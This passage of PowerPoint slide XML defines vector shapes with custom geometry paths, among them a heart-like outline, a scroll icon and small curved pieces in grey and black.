            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="290195" h="362585">
                <a:moveTo>
                  <a:pt x="144622" y="362324"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4088" y="115493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1022" y="101184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="96585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="91986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="87387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="82787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="511" y="77677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1533" y="73078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2044" y="68989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3066" y="64390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4599" y="60302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6132" y="55702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7665" y="51614"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9709" y="47526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11753" y="43438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14308" y="39860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16864" y="36283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19419" y="32706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21974" y="29129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25040" y="26062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28106" y="22485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31173" y="19930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64901" y="2044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68989" y="1022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73078" y="511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77166" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81765" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85853" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90453" y="511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94541" y="1533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98629" y="2555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103229" y="4088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107317" y="5621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111916" y="7665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116005" y="10220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120093" y="12775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124692" y="15842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128780" y="18908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132869" y="22996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136957" y="27084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140534" y="31684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144622" y="36283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156887" y="22996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160465" y="18908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165064" y="15842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169152" y="12775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="173240" y="10220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181417" y="7665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181928" y="5621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186016" y="4088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190616" y="2555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195215" y="1533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199303" y="511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203903" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207991" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212079" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216167" y="511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220767" y="1022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="224855" y="2044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228943" y="3066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="232521" y="4599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="236609" y="6132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240697" y="7665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="244274" y="9709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247852" y="11753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251429" y="14308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="255006" y="16864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="258072" y="19930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261650" y="22485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="264716" y="26062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267271" y="29129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="270337" y="32706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="272892" y="36283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="275448" y="39860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="277492" y="43438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279536" y="47526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="281580" y="51614"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283624" y="55702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285157" y="60302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286179" y="64390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287712" y="68989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288223" y="73078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289245" y="77677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289757" y="82787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289757" y="87387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289757" y="91986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289245" y="96585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288734" y="101184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287712" y="106295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286179" y="110894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285157" y="115493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144622" y="362324"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="14462">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="object 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6770565" y="5181814"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path>
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="14462">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="object 85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7344762" y="5899814"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path>
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="14462">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="object 86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5622170" y="1306235"/>
            <a:ext cx="1437034" cy="1580486"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="725170" h="797560">
                <a:moveTo>
                  <a:pt x="653103" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="214123" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187933" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165192" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149158" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143089" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143089" y="654125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="654125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45274" y="660273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22357" y="676482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6148" y="699399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="725670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6148" y="751940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22357" y="774857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45274" y="791066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="797215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="510013" y="797215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536283" y="791066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="559200" y="774857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="575409" y="751940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="581558" y="725670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="581558" y="143089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="653103" y="143089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="679373" y="136941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="702290" y="120732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718499" y="97815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="724648" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718499" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="702290" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="679373" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="653103" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E5E5E5"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="object 87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5622170" y="1306235"/>
            <a:ext cx="1437034" cy="1580486"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="725170" h="797560">
                <a:moveTo>
                  <a:pt x="71544" y="797215"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="45274" y="791066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22357" y="774857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6148" y="751940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="725670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6148" y="699399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22357" y="676482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45274" y="660273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="654125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143089" y="654125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143089" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149158" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165192" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187933" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214123" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="653103" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="679373" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="702290" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718499" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="724648" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718499" y="97815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="702290" y="120732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="679373" y="136941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="653103" y="143089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="581558" y="143089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="581558" y="725670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="575409" y="751940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="559200" y="774857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536283" y="791066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="510013" y="797215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="797215"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="object 88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5622170" y="130623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89" name="object 89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7058170" y="28860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90" name="object 90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5975602" y="1448014"/>
            <a:ext cx="212659" cy="142193"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="107314" h="71754">
                <a:moveTo>
                  <a:pt x="107317" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35772" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22637" y="3074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11178" y="11178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3074" y="22637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3074" y="48907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11178" y="60366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22637" y="68470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35772" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62042" y="65396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84959" y="49187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101169" y="26270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107317" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="B7B7B7"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="object 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5975602" y="1448014"/>
            <a:ext cx="212659" cy="142193"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="107314" h="71754">
                <a:moveTo>
                  <a:pt x="107317" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="101169" y="26270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84959" y="49187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62042" y="65396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35772" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22637" y="68470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11178" y="60366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3074" y="48907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3074" y="22637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11178" y="11178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22637" y="3074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35772" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107317" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="object 92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5622170" y="130623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93" name="object 93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7058170" y="28860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94" name="object 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5622170" y="2602483"/>
            <a:ext cx="284387" cy="284387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="143510" h="143509">
                <a:moveTo>
                  <a:pt x="71544" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="45274" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22357" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6148" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6148" y="97815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22357" y="120732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45274" y="136941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="143089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97815" y="136941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120732" y="120732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136941" y="97815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143089" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84680" y="68470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96138" y="60366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104243" y="48907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107317" y="35772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104243" y="22637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96138" y="11178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84680" y="3074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="B7B7B7"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="object 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5622170" y="2602483"/>
            <a:ext cx="284387" cy="284387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="143510" h="143509">
                <a:moveTo>
                  <a:pt x="143089" y="71544"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="136941" y="97815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120732" y="120732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97815" y="136941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="143089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45274" y="136941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22357" y="120732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6148" y="97815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6148" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22357" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45274" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84680" y="3074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107317" y="35772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84680" y="68470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143089" y="71544"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="object 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5622170" y="130623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97" name="object 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7058170" y="28860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98" name="object 98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6046491" y="1306236"/>
            <a:ext cx="142193" cy="142193"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="71755" h="71754">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="71544" y="71544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65396" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49187" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26270" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="B7B7B7"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="object 99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6046491" y="1306236"/>
            <a:ext cx="142193" cy="142193"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="71755" h="71754">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="26270" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49187" y="22357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65396" y="45274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71544" y="71544"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="object 100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
